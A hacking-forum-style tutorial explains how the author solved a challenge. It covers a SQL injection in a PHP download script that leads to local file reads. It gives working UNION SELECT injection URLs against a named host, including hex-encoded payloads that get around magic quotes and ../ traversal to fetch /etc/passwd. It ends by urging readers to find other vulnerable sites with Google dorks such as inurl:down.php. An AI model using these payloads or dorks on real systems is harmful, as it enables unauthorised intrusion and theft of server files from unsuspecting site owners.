Sql Injection in a Download PHP Script leading to LFI – Tutorial

Hello everyone,

The title says it, we’re going to sql inject a vulnerable Download PHP Script which will allow us later on to read files on the server.
This whole thing started with a Challenge posted on HF by SirRootALot and was only solved by 2 members including me which is kind of awkward and since a lot of people asked for an explanation I decided to make a tutorial.

 

What is this About:

  1. Detailed Explanation about few MySql Functions/Operators/etc
  2. Changing the Result of an Official Sql Statement using Sql Injection
  3. A simple Example of a vulnerable Download PHP Script
  4. Solving the Challenge

 

Detailed Explanation about few MySql Functions/Operators/etc + Changing the Result of a Sql Statement:

  • ORDER BY: The ORDER BY keyword is used to sort the data in a recordset.
  1. When you’re injecting and you order by 2 for example this doesn’t necessary means that the table contains only 2 columns; the ‘order by’ function is related to the number of columns that the Select Statement is dealing with.
  2. Examples – Table’s name=members Columns Count=5:

    Select * from `members` ORDER BY 5

    (This will work just fine)

    Select `id`,`email` from `members` ORDER BY 5

    (Won’t work obviously)

    Select `id`, `email` from `members` ORDER BY 2

    (Works great)

  3. I had to make this clear for the sake of MySql and we’re also going to be in need of this later on.

 

  • UNION: UNION is used to combine the result from multiple SELECT statements into a single result set.
  1. I also had to make this clear because what I’ve already mentioned is probably the only thing we’re going to use in this challenge… So as injectors, we need the UNION Syntax to inject our own Sql Statements, and the important thing here is that whenever we do that we are temporary adding an extra row to the table.
  2. Pictures
    normal
    injected

 

  • AND FALSE/null/etc…:
  1. Pictures should be enough here:
    normal2
    injected2
    See what was done there? We edited the Result, we do this the whole time and it’s exactly what we have to do this time as well, I just had to make this clear step by step for anyone in need.

 

A simple Example of a vulnerable Download PHP Script:

Here’s something I wrote quickly: http://pastebin.com/dEvRnhc4

 

So there’s 2 primary things needed in every Download PHP Script and they are, 1, the name of the attachment which could be anything and , 2, the location of the file on the server itself.
Now in most cases, both of these values can be found in a database and a well secure Script would be perfect but unfortunately, in this case it’s not…

 

Solving the Challenge:

  • Getting Number of Columns: http://swse.doersgroup.gethompy.com/inc/down.php?fUID=3 ORDER BY 2
    So, 2 columns are being used by the Select Sql Statement and these two columns are probably the ones holding the primary values needed for any Download PHP Script which means that the challenge is now solved…
  • Finalizing:

  1. http://swse.doersgroup.gethompy.com/inc/down.php?fUID=3 AND FALSE UNION SELECT nameoffilehere,locationhere

    OR

    http://swse.doersgroup.gethompy.com/inc/down.php?fUID=3 AND FALSE UNION SELECT locationhere,nameoffilehere

  2. Now we have to HEX everything because PHP Magic Quotes is ON which means that we can’t use ‘ or ”

    http://swse.doersgroup.gethompy.com/inc/down.php?fUID=3 AND FALSE UNION SELECT 0x6e616d656f6666696c6568657265,0x2f6574632f706173737764

  3. Now this doesn’t download ‘/etc/passwd’ so before we move on lets try and move few directories backwards

    http://swse.doersgroup.gethompy.com/inc/down.php?fUID=1000 and false union select 0x6e616d656f6666696c6568657265, 0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764

    And we’re done here.

Solving this challenge needed basic knowledge of Mysql and PHP since you simply had to know what ‘Order By’, ‘Union Select’ and ‘And False’ actually means and how a Download PHP Script actually works etc…
Myself, I started using Erorr Based Sql Injection with the LOAD_FILE function which didn’t work out the way I wanted so I moved on to this solution which was neat and simple.

Now the good thing is that we can read any file on a server using any similar vulnerabilities instead of just reading what’s in the databases, and if you’re looking for more then go ahead and use Google with dorks, maybe:
inurl:down.php
inrul:download.php
inurl:down.php?id=
etc..

That’s all for today and thanks for reading,
dotcppfile.

Leave a comment